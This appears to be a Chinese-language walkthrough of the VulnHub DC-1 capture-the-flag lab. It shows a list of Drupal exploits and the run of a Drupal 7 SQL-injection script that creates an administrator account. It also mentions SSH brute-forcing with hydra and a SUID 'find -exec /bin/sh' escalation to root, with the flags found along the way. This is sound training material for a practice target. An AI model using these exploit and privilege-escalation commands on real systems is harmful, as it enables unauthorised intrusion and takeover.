Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasplo | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Exec | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Exec | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remot | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Si | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cro | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripti | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary Fi | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: A | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------- ---------------------------------Paper Title | Path
---------------------------------------------------------------------- ---------------------------------
[Turkish] Drupal Coder Vulnerability Analysis & MSF Module Dev | docs/turkish/40244-[turkish]-dru
---------------------------------------------------------------------- ---------------------------------
可以看到第13行有一个直接添加用户的脚本
python2 /opt/exploitdb/exploits/php/webapps/34992.py -t http://192.168.1.9/ -u user -p pwd ______ __ _______ _______ _____ | _ \ .----.--.--.-----.---.-| | | _ || _ | _ | |. | \| _| | | _ | _ | | |___| _|___| |.| | |. | |__| |_____| __|___._|__| / |___(__ `-|. | |: 1 / |__| | | |: 1 | |: | |::.. . / | | |::.. . | |::.| `------' `---' `-------' `---' _______ __ ___ __ __ __ | _ .-----| | | .-----|__.-----.----| |_|__.-----.-----. | 1___| _ | | |. | | | -__| __| _| | _ | | |____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__| |: 1 | |__| |: | |___| |::.. . | |::.| `-------' `---' Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n Admin 4cc0unt cr3at0r Discovered by: Stefan Horst (CVE-2014-3704) Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww[!] VULNERABLE![!] Administrator user created![*] Login: user[*] Pass: pwd[*] Url: http://192.168.1.9//?q=node&destination=node
因此登录网站可以看到flag3
通过查找发现flag在/etc 某个文件夹下,思考如何进行查找以提权工作
爆破ssh
使用hydra
可以看到密码是orange
进行ssh登录后使用命令可以发现flag4
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.flag4@DC-1:~$ lsflag4.txtflag4@DC-1:~$ cat flag4.txt Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?
进行提权
- 查看是否具有SUID标识
查找具有SUID的命令
flag4@DC-1:~$ find / -perm -4000 2>/dev/null/bin/mount/bin/ping/bin/su/bin/ping6/bin/umount/usr/bin/at/usr/bin/chsh/usr/bin/passwd/usr/bin/newgrp/usr/bin/chfn/usr/bin/gpasswd/usr/bin/procmail/usr/bin/find/usr/sbin/exim4/usr/lib/pt_chown/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-device/usr/lib/dbus-1.0/dbus-daemon-launch-helper/sbin/mount.nfs
提权以及查找最后一个flag
flag4@DC-1:~$ find flag4.txt -exec "/bin/sh" \;# pwd/home/flag4# whoamiroot# cd /root # lsthefinalflag.txt# cat thefinalflag.txtWell done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journeyby contacting me via Twitter - @DCAU7#
flag汇总
flag1
Every good CMS needs a config file - and so do you.
flag2
/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
flag4
Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?
flag5
Well done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journeyby contacting me via Twitter - @DCAU7
vulnhub 网站靶机 DC-1 打靶记录相关推荐
- 【vulnhub】靶机- [DC系列]DC9(附靶机))
主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- VulnHub - Pluck靶机
VulnHub - Pluck靶机 arp-scan -l 探测靶机地址 nmap -sV -Pn -A x.x.x.230 dirb http://x.x.x.230 扫描目录 发现index.ph ...
- vulnhub——Earth靶机
一.概要 攻击机:192.168.60.148 靶机:192.168.60.174 靶机下载地址:https://download.vulnhub.com/theplanets/Earth.ova.t ...
- vulnhub——ICA1靶机
一.概要 靶机:192.168.1.103 攻击机:192.168.1.101 靶机下载地址:https://download.vulnhub.com/ica/ica1.zip 参考文章:https: ...
- VulnHub DC1靶机渗透测试
1. 说明 虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...
- php记录网站访问,PHP简单实现记录网站访问量的功能
这篇文章主要介绍了PHP简单实现记录网站访问量功能,涉及php针对文件加锁读写及日期时间转换等相关操作技巧,需要的朋友可以参考下 本文实例讲述了PHP简单实现记录网站访问量功能.分享给大家供大家参考, ...
- 网站访客 简易日志记录
摘要 header 查看header 模拟header php中的使用 IP接口 接口介绍 PHP访问接口并解析 简易方式 略繁方式 解析JSON数据 记录器 操作系统信息 获取浏览器信息 核心 最终 ...
- (全栈旅行足迹地图打卡网站 0-1)-旅行足迹文章记录(项目完结)-15(WebGIS Vue-js-go-mysql)
专栏项目效果 (全栈旅行足迹地图打卡网站 0-1)-项目概述-01(WebGIS Vue-js-go-mysql) 本节将介绍本项目的最后一个功能点旅行足迹地图打卡文章记录,主要是实现每次的旅行的记录 ...
- vulnhub:Typo靶机
kali:192.168.111.111 靶机:192.168.111.163 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
最新文章
- 建议使用更加安全的ast.literal_eval去替代eval
- Linux中如何将文件dump成16进制值
- 从HttpServletRequest获取完整的请求路径
- 简单点儿、简单点儿、再简单点儿,其实世界可以不是我们想象的那么复杂
- MySQL--3--mysqldump备份策略
- 设计模式(10)-----模板方法模式
- C# asp.net页面通过URL参数传值中文乱码问题解决办法
- 二维数组及以上维度的数组,本质是一维数组?(C语言)
- Laravel 模型事件的应用
- 苹果鼠标滚轮驱动_苹果鼠标magic mouse在戴尔电脑Windows10系统上使用滚轮的方法...
- illustrator插件-拼版功能开发-印前角线-js脚本开发-ai插件
- 2020年最全易语言安装与配置使用教程
- 计算机备份打印机驱动程序,windows7如何快速备份打印机驱动
- 数据库——数据库的备份和还原
- android硬编码h264数据,并使用rtp推送数据流,实现一个简单的直播-MediaCodec(二)
- debug断点调试进不去
- 安全加密邮箱哪个好?
- css 属性 linear-gradient 渐变色
- 2022年中职组“网络安全”赛项湖南省任务书
- 高斯旋转热源与双椭球热源_【干货】论焊接,3D打印模拟的热源模型——焊缝、3D打印高度变换模拟...